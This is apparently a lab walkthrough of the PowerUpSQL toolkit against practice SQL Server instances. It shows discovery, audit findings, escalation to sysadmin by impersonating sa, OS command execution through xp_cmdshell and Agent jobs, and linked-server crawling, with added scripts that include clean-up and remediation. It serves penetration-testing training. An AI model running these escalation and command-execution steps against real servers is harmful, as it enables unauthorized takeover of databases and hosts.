PowerUpSQL

1. PowerUpSQL

PowerUpSQL is a PowerShell toolkit for SQL Server. Like impacket-mssqlclient it lets you run T-SQL queries against an instance quickly, here from a Windows host, but it also bundles discovery, auditing, privilege-escalation, OS command execution and linked-server crawling functions, all of which are used below.

1.1. Usage

The toolkit's cheat sheet, which lists every function used below, is available here:
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet

1.1.1. Connecting to an MSSQL Server instance

PS C:\Users\student\Desktop\PowerUpSQL> Import-Module .\PowerUpSQL.psm1
PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLQuery -Verbose -Instance "127.0.0.1,1433" -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Query "SELECT SYSTEM_USER"
VERBOSE: 127.0.0.1,1433 : Connection Success.

Column1
-------
ws_dev

1.1.2. Enumeration

The Get-SQLInstanceLocal, Get-SQLInstanceBroadcast and Get-SQLInstanceDomain functions are used, respectively, for:
- local discovery: find the SQL Server instances installed on the current machine
- broadcast discovery: send a UDP broadcast to the local subnet and collect the instances that answer, i.e. those exposed on the network
- domain discovery: query Active Directory for MSSQLSvc service principal names (SPNs) and build the list of every SQL Server instance registered in the domain; this needs no SQL credentials, only a domain context

PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 2 instances were found.


ComputerName     : SQL02.htb.local
Instance         : SQL02.htb.local,1433
DomainAccountSid : 1500000521000186208125681511122181312461583125284400
DomainAccount    : SQL02$
DomainAccountCn  : SQL02
Service          : MSSQLSvc
Spn              : MSSQLSvc/SQL02.htb.local:1433
LastLogon        : 3/16/2026 2:33 AM
Description      :

ComputerName     : SQL02.htb.local
Instance         : SQL02.htb.local
DomainAccountSid : 1500000521000186208125681511122181312461583125284400
DomainAccount    : SQL02$
DomainAccountCn  : SQL02
Service          : MSSQLSvc
Spn              : MSSQLSvc/SQL02.htb.local
LastLogon        : 3/16/2026 2:33 AM
Description      :
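The following is an added example, not code from the page or from the PowerUpSQL project: it chains the three discovery functions into the toolkit's connection tester so that only instances the ws_dev login can actually authenticate to are enumerated further. It assumes the module, login and password from the transcript above, and that Get-SQLConnectionTestThreaded reports "Accessible" in its Status field, as documented in the project's cheat sheet.

```powershell
# Added example: discover instances from all three sources, then keep only the
# ones the ws_dev login can log in to before pulling details from them.
Import-Module .\PowerUpSQL.psm1

$Username = 'ws_dev'
$Password = '4X6cuvDLNer7nwYN5LBZ'   # credential from the page's transcript

# Discovery: local registry/services, UDP 1434 browser broadcast, and AD SPNs.
# The same host can show up twice (with and without ",1433"), so dedupe on Instance.
$Instances = @(
    Get-SQLInstanceLocal
    Get-SQLInstanceBroadcast
    Get-SQLInstanceDomain
) | Sort-Object -Property Instance -Unique

# Connection test: one TDS login per instance, in parallel. Each attempt that fails
# produces a failed-login event (18456) on that server, so keep the credential list short.
$Reachable = $Instances |
    Get-SQLConnectionTestThreaded -Username $Username -Password $Password -Threads 10 |
    Where-Object { $_.Status -eq 'Accessible' }

# Only a working login can answer these questions: service account (what OS commands
# would run as), version, whether TLS is forced, and whether we are already sysadmin.
$Reachable | ForEach-Object {
    Get-SQLServerInfo -Instance $_.Instance -Username $Username -Password $Password
} | Select-Object Instance, ServiceAccount, SQLServerMajorVersion, AuthenticationMode,
                  ForcedEncryption, IsSysadmin |
    Format-Table -AutoSize
```

Get-SQLInstanceDomain on its own only needs the domain context of the current user; the credential is first used by Get-SQLConnectionTestThreaded, so discovery stays quiet and the noisy part is limited to the login attempts.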

Get-SQLServerInfo and Invoke-SQLDumpInfo can be used to enumerate a specific instance further


PS C:\Users\student\Desktop\PowerUpSQL> Get-SQLServerInfo -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"


ComputerName           : SQL01
Instance               : SQL01
DomainName             : HTB
ServiceProcessID       : 4628
ServiceName            : MSSQLSERVER
ServiceAccount         : HTB\svc_sql
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 16.0.1000.6
SQLServerMajorVersion  : 2022
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : ws_dev
IsSysadmin             : No
ActiveSessions         : 1

Invoke-SQLDumpInfo writes a large set of CSV files to the current directory, one per category (databases, users, privileges and more), named after the instance:

PS C:\Users\student\Desktop\PowerUpSQL> Invoke-SQLDumpInfo -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
PS C:\Users\student\Desktop\PowerUpSQL> type SQL01_Databases.csv
"ComputerName","Instance","DatabaseId","DatabaseName","DatabaseOwner","OwnerIsSysadmin","is_trustworthy_on","is_db_chaining_on","is_broker_enabled","is_encrypted","is_read_only","create_date","recovery_model_desc","FileName","DbSizeMb","has_dbaccess"
"SQL01","SQL01","5","webshop","sa","1","True","False","False","False","False","5/13/2024 4:16:03 PM","FULL","C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\webshop.mdf","","1"
"SQL01","SQL01","6","privesc","sa","1","False","False","False","False","False","5/19/2024 3:42:55 AM","FULL","C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\privesc.mdf","","0"
PS C:\Users\student\Desktop\PowerUpSQL>

Invoke-SQLAudit runs the toolkit's vulnerability checks against the instance to quickly enumerate likely weaknesses. Note that the dump above already shows one of them: the webshop database is TRUSTWORTHY and owned by sa (OwnerIsSysadmin = 1), a combination the audit flags below.

PS C:\Users\student\Desktop\PowerUpSQL> Invoke-SQLAudit -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"
VERBOSE: SQL01 : No named instance found.
VERBOSE: SQL01 : Connection Success.
VERBOSE: SQL01 : Checking for autoexec stored procedures...


ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Excessive Privilege - Impersonate Login
Description   : The current SQL Server login can impersonate other logins.  This may allow an
                authenticated login to gain additional privileges.
Remediation   : Consider using an alterative to impersonation such as signed stored procedures.
                Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to
                [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa
                to [user]
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQL01 -Exploit
Details       : ws_dev can impersonate the sa SYSADMIN login. This test was ran with the ws_dev
                login.
Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Excessive Privilege - Impersonate Login
Description   : The current SQL Server login can impersonate other logins.  This may allow an
                authenticated login to gain additional privileges.
Remediation   : Consider using an alterative to impersonation such as signed stored procedures.
                Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to
                [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa
                to [user]
Severity      : High
IsVulnerable  : Yes
IsExploitable : No
Exploited     : No
ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQL01 -Exploit
Details       : ws_dev can impersonate the ws_user login (not a sysadmin). This test was ran with
                the ws_dev login.
Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Excessive Privilege - Trustworthy Database
Description   : One or more database is configured as trustworthy.  The TRUSTWORTHY database
                property is used to indicate whether the instance of SQL Server trusts the
                database and the contents within it.  Including potentially malicious assemblies
                with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious
                modules that are defined to execute as high privileged users. Combined with other
                weak configurations it can lead to user impersonation and arbitrary code exection
                on the server.
Remediation   : Configured the affected database so the 'is_trustworthy_on' flag is set to
                'false'.  A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used
                to set a database as trustworthy.  A query similar to 'ALTER DATABASE MyAppDb SET
                TRUSTWORTHY OFF' can be use to unset it.
Severity      : Low
IsVulnerable  : Yes
IsExploitable : No
Exploited     : No
ExploitCmd    : There is not exploit available at this time.
Details       : The database webshop was found configured as trustworthy.
Reference     : https://msdn.microsoft.com/en-us/library/ms187861.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Excessive Privilege - Execute xp_dirtree
Description   : xp_dirtree is a native extended stored procedure that can be executed by members
                of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to
                force the SQL Server service account to authenticate to a remote attacker.  The
                service account password hash can then be captured + cracked or relayed to gain
                unauthorized access to systems. This also means xp_dirtree can be used to
                escalate a lower privileged user to sysadmin when a machine or managed account
                isnt being used.  Thats because the SQL Server service account is a member of the
                sysadmin role in SQL Server 2000-2014, by default.
Remediation   : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative
                logins and roles.  Example command: REVOKE EXECUTE ON xp_dirtree to Public
Severity      : Medium
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Crack the password hash offline or relay it to another system.
Details       : The public principal has EXECUTE privileges on the xp_dirtree procedure in the
                master database.
Reference     : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploi
                t/
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Excessive Privilege - Execute xp_fileexist
Description   : xp_fileexist is a native extended stored procedure that can be executed by
                members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be
                used to force the SQL Server service account to authenticate to a remote
                attacker.  The service account password hash can then be captured + cracked or
                relayed to gain unauthorized access to systems. This also means xp_dirtree can be
                used to escalate a lower privileged user to sysadmin when a machine or managed
                account isnt being used.  Thats because the SQL Server service account is a
                member of the sysadmin role in SQL Server 2000-2014, by default.
Remediation   : Remove EXECUTE privileges on the xp_fileexist procedure for non administrative
                logins and roles.  Example command: REVOKE EXECUTE ON xp_fileexist to Public
Severity      : Medium
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Crack the password hash offline or relay it to another system.
Details       : The public principal has EXECUTE privileges on xp_fileexist procedure in the
                master database.
Reference     : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploi
                t/
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQL01
Instance      : SQL01
Vulnerability : Potentially Sensitive Columns Found
Description   : Columns were found in non default databases that may contain sensitive
                information.
Remediation   : Ensure that all passwords and senstive data are masked, hashed, or encrypted.
Severity      : Informational
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : Yes
ExploitCmd    : Invoke-SQLAuditSampleDataByColumn -Instance SQL01 -Exploit
Details       : Data sample from [webshop].[dbo].[Users].[Password] :
                "c8c4769906056ccc4950e5827b79cd12".
Reference     : https://msdn.microsoft.com/en-us/library/ms188348.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016
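To reproduce the three findings above without relying on the toolkit's check logic, here is an added example (not from the page or from PowerUpSQL) that asks the server catalog directly through Get-SQLQuery. It assumes the SQL01 instance, the ws_dev login and the password from the transcript; the queries are read-only and need only the metadata visibility ws_dev already has.

```powershell
# Added example: confirm the Invoke-SQLAudit findings with direct catalog queries.
Import-Module .\PowerUpSQL.psm1
$Conn = @{ Instance = 'SQL01'; Username = 'ws_dev'; Password = '4X6cuvDLNer7nwYN5LBZ' }

# 1. "Impersonate Login": which logins may ws_dev impersonate, and is the target sysadmin?
#    For IMPERSONATE granted on a login, major_id in sys.server_permissions is the
#    principal_id of the login that may be impersonated.
Get-SQLQuery @Conn -Query @"
SELECT grantee.name AS grantee,
       target.name  AS impersonated_login,
       pe.state_desc,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions pe
JOIN sys.server_principals grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON pe.major_id = target.principal_id
WHERE pe.permission_name = 'IMPERSONATE'
  AND pe.class_desc = 'SERVER_PRINCIPAL';
"@

# 2. "Trustworthy Database": TRUSTWORTHY is only dangerous together with a sysadmin
#    owner, because then a db_owner can run EXECUTE AS OWNER code with server-wide rights.
Get-SQLQuery @Conn -Query @"
SELECT name, is_trustworthy_on,
       SUSER_SNAME(owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(owner_sid)) AS owner_is_sysadmin
FROM sys.databases
WHERE is_trustworthy_on = 1;
"@

# 3. "Execute xp_dirtree / xp_fileexist": EXECUTE granted to public in master means any
#    login can make the service account authenticate to a UNC path of its choosing.
Get-SQLQuery @Conn -Query @"
SELECT OBJECT_NAME(pe.major_id, DB_ID('master')) AS procedure_name,
       pr.name AS grantee, pe.permission_name, pe.state_desc
FROM master.sys.database_permissions pe
JOIN master.sys.database_principals pr ON pe.grantee_principal_id = pr.principal_id
WHERE pe.major_id IN (OBJECT_ID('master.sys.xp_dirtree'),
                      OBJECT_ID('master.sys.xp_fileexist'));
"@
```

The first query is also the one to re-run after remediation: once the REVOKE from the audit output has been applied, the sa row disappears and the ws_user row, which the audit rated as not exploitable, can be judged separately.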

1.1.3. Privilege escalation

Invoke-SQLEscalatePriv automatically enumerates the weaknesses (it calls Invoke-SQLAudit under the hood), runs the ones that have an exploit, and keeps going until the login is sysadmin


PS C:\Users\student\Desktop> Invoke-SQLEscalatePriv -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Verbose
VERBOSE: SQL01 : Checking if you're already a sysadmin...
VERBOSE: SQL01 : You're not a sysadmin, attempting to change that...
VERBOSE: LOADING VULNERABILITY CHECKS.
VERBOSE: RUNNING VULNERABILITY CHECKS.
<SNIP>
VERBOSE: SQL01 : Success! You are now a sysadmin!


This change is persistent: the exploit adds the login I used (ws_dev) to the sysadmin server role, so it stays sysadmin across sessions until someone removes it with ALTER SERVER ROLE sysadmin DROP MEMBER. Record it in the engagement log so it can be reverted, and expect it to show up in the server's default trace.
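As an added example (not the page's or PowerUpSQL's own code), the manual equivalent of what Invoke-SQLEscalatePriv did through the "Impersonate Login" finding, together with the before/after checks and the clean-up. It assumes the SQL01 instance and the ws_dev login from the transcript; the sa login is the impersonation target the audit reported.

```powershell
# Added example: impersonation-based escalation done by hand, then reverted.
Import-Module .\PowerUpSQL.psm1
$Conn = @{ Instance = 'SQL01'; Username = 'ws_dev'; Password = '4X6cuvDLNer7nwYN5LBZ' }

$WhoAmI = "SELECT SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;"

# Before: ws_dev, is_sysadmin = 0.
Get-SQLQuery @Conn -Query $WhoAmI

# Step 1: impersonation is scoped to the session. Inside EXECUTE AS the server sees sa,
# REVERT returns to ws_dev. On its own this gives privileged queries, not a privileged login.
Get-SQLQuery @Conn -Query @"
EXECUTE AS LOGIN = 'sa';
$WhoAmI
REVERT;
"@

# Step 2: what makes it stick (and what the toolkit does): while running as sa, add the real
# login to the sysadmin role. Server-level, persistent, and recorded by the default trace.
Get-SQLQuery @Conn -Query @"
EXECUTE AS LOGIN = 'sa';
ALTER SERVER ROLE sysadmin ADD MEMBER [ws_dev];
REVERT;
"@

# After: a fresh connection as ws_dev is sysadmin without impersonating anyone.
Get-SQLQuery @Conn -Query $WhoAmI

# Clean-up at the end of the engagement. Done from the sa context so that ws_dev's own role
# membership is irrelevant: first revoke the grant that made the escalation possible (the
# remediation from the audit output), then remove the role membership.
Get-SQLQuery @Conn -Query @"
EXECUTE AS LOGIN = 'sa';
REVOKE IMPERSONATE ON LOGIN::sa FROM [ws_dev];
ALTER SERVER ROLE sysadmin DROP MEMBER [ws_dev];
REVERT;
"@

# Verify: back to ws_dev, is_sysadmin = 0, and the IMPERSONATE row is gone.
Get-SQLQuery @Conn -Query $WhoAmI
```

Step 1 alone is often enough for an assessment (every query can be wrapped in EXECUTE AS ... REVERT), and it leaves no persistent change behind; step 2 is only worth it when a tool that opens its own connections, such as the command-execution functions in the next section, needs the login itself to be sysadmin.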

1.1.4. Command execution

All three command-execution functions in practice need sysadmin, which we now have. Invoke-SQLOSCmd runs the command through xp_cmdshell and returns its output; Invoke-SQLOSCmdOle does the same through the OLE Automation procedures (sp_OACreate). Both execute as the database engine's service account (htb\svc_sql below). Invoke-SQLOSCmdAgentJob instead creates and starts a SQL Server Agent job, so the command runs under the Agent service account (or a proxy), it does not return the command output, and it needs the extra SubSystem parameter to specify which subsystem the job step uses (PowerShell, CmdExec, JScript or VBScript)

PS C:\Users\student\Desktop> Invoke-SQLOSCmd -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Command "whoami"

ComputerName Instance CommandResults
------------ -------- --------------
SQL01        SQL01    htb\svc_sql

PS C:\Users\student\Desktop> Invoke-SQLOSCmdAgentJob -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -SubSystem "CmdExec" -Command "whoami"

ComputerName Instance Results
------------ -------- -------
SQL01        SQL01    The Job succesfully started and was removed.

PS C:\Users\student\Desktop> Invoke-SQLOSCmdOle -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Command "whoami"

ComputerName Instance CommandResults
------------ -------- --------------
SQL01        SQL01    htb\svc_sql
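Before picking one of the three execution paths it is worth checking which ones the instance can actually use and what the command will run as. The following is an added example, not from the page or PowerUpSQL; it assumes the ws_dev login is already sysadmin (as after the previous section), since sys.dm_server_services needs VIEW SERVER STATE.

```powershell
# Added example: pre-flight checks for the three OS command execution paths.
Import-Module .\PowerUpSQL.psm1
$Conn = @{ Instance = 'SQL01'; Username = 'ws_dev'; Password = '4X6cuvDLNer7nwYN5LBZ' }

# Server options behind Invoke-SQLOSCmd (xp_cmdshell) and Invoke-SQLOSCmdOle
# ('Ole Automation Procedures'). The toolkit flips them with sp_configure when needed,
# and every flip is written to the SQL Server error log ("Configuration option ... changed").
$ConfigQuery = @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');
"@
$Before = Get-SQLQuery @Conn -Query $ConfigQuery
$Before | Format-Table -AutoSize

# Service state and accounts: the Agent must be running for Invoke-SQLOSCmdAgentJob, and
# service_account is the identity each path's command will execute as.
Get-SQLQuery @Conn -Query @"
SELECT servicename, status_desc, startup_type_desc, service_account
FROM sys.dm_server_services;
"@ | Format-Table -AutoSize

# Run something more useful than whoami: the privileges of the service account decide
# the next step on the host (e.g. SeImpersonatePrivilege for a token-based escalation).
Invoke-SQLOSCmd @Conn -Command 'whoami /priv' | Select-Object -ExpandProperty CommandResults

# Do not assume the toolkit restored the option: compare with the state captured earlier.
$After = Get-SQLQuery @Conn -Query $ConfigQuery
Compare-Object -ReferenceObject $Before -DifferenceObject $After -Property name, value_in_use
```

An empty Compare-Object result means xp_cmdshell is back in the state it was found in; anything else is a configuration change that has to go into the report.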

1.1.5. Lateral movement

Get-SqlServerLinkCrawl enumerates linked servers and follows them recursively (SQL01 to SQL02 and back to SQL01), recording for each hop which login the query lands as and whether that login is sysadmin


PS C:\Users\student\Desktop> Get-SqlServerLinkCrawl -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01"

Version     : SQL Server 2022
Instance    : SQL01
CustomQuery :
Sysadmin    : 1
Path        : {SQL01}
User        : ws_dev
Links       : {SQL02}

Version     : SQL Server 2022
Instance    : SQL02
CustomQuery :
Sysadmin    : 1
Path        : {SQL01, SQL02}
User        : sa
Links       : {SQL01}

Version     : SQL Server 2022
Instance    : SQL01
CustomQuery :
Sysadmin    : 0
Path        : {SQL01, SQL02, SQL01}
User        : ws_user
Links       : {SQL02}

The second record shows that the link from SQL01 to SQL02 is mapped to the sa login: anything ws_dev sends through that link runs on SQL02 as sysadmin, even though ws_dev itself is not. The third shows the reverse link, SQL02 back to SQL01, is mapped to ws_user, which is not sysadmin.

Queries are sent to a linked server from SQL01 either with OPENQUERY([SQL02], '...'), which runs a single SELECT on the remote side, or with EXECUTE ('...') AT [SQL02], which runs an arbitrary batch but requires the link's RPC Out option. Get-SQLServerLinkCrawl's -Query parameter runs the given query on every node it reaches; the results come back in the CustomQuery property as System.Data.DataRow objects rather than plain values, so they have to be iterated to read the actual contents

PS C:\Users\student\Desktop> $Out = Get-SQLServerLinkCrawl -Username "ws_dev" -Password "4X6cuvDLNer7nwYN5LBZ" -Instance "SQL01" -Query "SELECT SYSTEM_USER";
PS C:\Users\student\Desktop> $Out

Version     : SQL Server 2022
Instance    : SQL01
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {SQL01}
User        : ws_dev
Links       : {SQL02}

Version     : SQL Server 2022
Instance    : SQL02
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {SQL01, SQL02}
User        : sa
Links       : {SQL01}

Version     : SQL Server 2022
Instance    : SQL01
CustomQuery : System.Data.DataRow
Sysadmin    : 0
Path        : {SQL01, SQL02, SQL01}
User        : ws_user
Links       : {SQL02}

PS C:\Users\student\Desktop> foreach ($Server in $out) {$CustomQuery = $Server.CustomQuery; foreach ($Row in $CustomQuery) {Write-Host($Row.Item(0));}};
ws_dev
sa
ws_user
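The following is an added example, not from the page or from PowerUpSQL, that reproduces the crawl by hand and checks the two link properties that decide what can be done over a link. It assumes SQL01, the ws_dev login and the link names SQL02 and SQL01 from the transcript above.

```powershell
# Added example: inspect the links on SQL01 and query across them manually.
Import-Module .\PowerUpSQL.psm1
$Conn = @{ Instance = 'SQL01'; Username = 'ws_dev'; Password = '4X6cuvDLNer7nwYN5LBZ' }

# Link inventory. local_principal_id = 0 is the default login mapping; remote_name is the
# login used on the far side (this is where the "User : sa" in the crawl output comes from).
# is_rpc_out_enabled decides whether EXECUTE ... AT works; data access is enough for OPENQUERY.
Get-SQLQuery @Conn -Query @"
SELECT s.name AS link, s.data_source, s.is_data_access_enabled, s.is_rpc_out_enabled,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id AND ll.local_principal_id = 0
WHERE s.is_linked = 1;
"@ | Format-Table -AutoSize

# OPENQUERY: the inner string is parsed by SQL02, so single quotes inside it are doubled.
# Expected to show sa / 1, matching the second crawl record.
Get-SQLQuery @Conn -Query @"
SELECT * FROM OPENQUERY([SQL02],
  'SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');
"@

# EXECUTE ... AT: needs RPC Out = 1 on the link, but is not limited to a single SELECT,
# so it is the way to run sp_configure or xp_cmdshell on the remote side as sa.
Get-SQLQuery @Conn -Query @"
EXECUTE ('SELECT SYSTEM_USER AS remote_login, @@SERVERNAME AS server') AT [SQL02];
"@

# Two hops, the path the crawler took: SQL01 -> SQL02 -> SQL01. Quotes are doubled once
# per nesting level. Expected to land as ws_user, matching the third crawl record.
Get-SQLQuery @Conn -Query @"
SELECT * FROM OPENQUERY([SQL02],
  'SELECT * FROM OPENQUERY([SQL01], ''SELECT SYSTEM_USER AS login_on_sql01'')');
"@
```

The first query is the one to show the owner of SQL02: a link mapped to sa turns every login on SQL01 that can reach the link into a sysadmin on SQL02, which is why the fix is a least-privilege remote login (or impersonation of the caller's own credentials) rather than anything on SQL01.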